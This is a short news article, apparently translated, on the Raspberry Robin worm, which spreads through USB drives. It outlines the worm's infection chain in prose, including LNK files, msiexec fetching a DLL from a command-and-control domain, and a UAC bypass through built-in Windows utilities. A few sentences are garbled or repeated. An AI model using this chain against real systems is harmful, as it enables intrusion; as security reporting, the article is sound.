A computer worm spreads using USB drives

Analysts have discovered new Windows malware that spreads using external USB drives.

Cybersecurity researchers have discovered new Windows malware. The latter has worm-like capabilities and spreads through removable USB devices.

Specifically, it was Red Canary’s detection engineering team that detected this new Windows malware. The malware was first observed in September 2021 in the networks of many customers, including some in the technology and manufacturing sectors. It is related to Raspberry Robin, a set of malicious activities. the worm in the networks of many customers, including some in the technology and manufacturing industries.

Operating mode

This worm spreads in new Windows systems when an infected USB drive containing a malicious file is connected. The worm payload is present on the device and appears as a .LNK shortcut file to a legitimate folder. Concretely, once the key is connected, the malware generates a new process. It uses cmd.exe to launch a malicious file stored on the infected drive.

It then launches explorer.exe and Microsoft Standard Installer (msiexec.exe). The latter is used to communicate with a malicious domain on the external network for command and control (C2) purposes. msiexec.exe is also used to download and install a DLL library file. Put simply, Raspberry Robin uses Microsoft Standard Installer to attempt external network communication to a malicious domain.

“While msiexec.exe downloads and executes legitimate installer packages, adversaries also exploit it to deliver malware”, the researchers said. Next, the malicious DLL library is then loaded and executed using a chain of legitimate Windows utilities. For example, fodhelper.exe, rundll32.exe to rundll32.exe and odbcconf.exe. Thus, it bypasses User Account Control (UAC).

Gray area

The researchers have not solved the whole problem. “First, we don’t know how or where Raspberry Robin infects external drives to perpetuate its business” they explain. They add, “but it’s likely to be happening offline or out of our view”. Likewise, they don’t know why Raspberry Robin installs a malicious DLL.

“One hypothesis is that this may be an attempt to establish persistence on an infected system, although additional information is needed to establish confidence in this hypothesis”

Finally, there is no information about the malicious tasks of the end stage of the malware. The purpose of the Raspberry Robin operators is still unknown.

Follow Geeko on Facebook, Youtube and Instagram to not miss any news, tests and tips.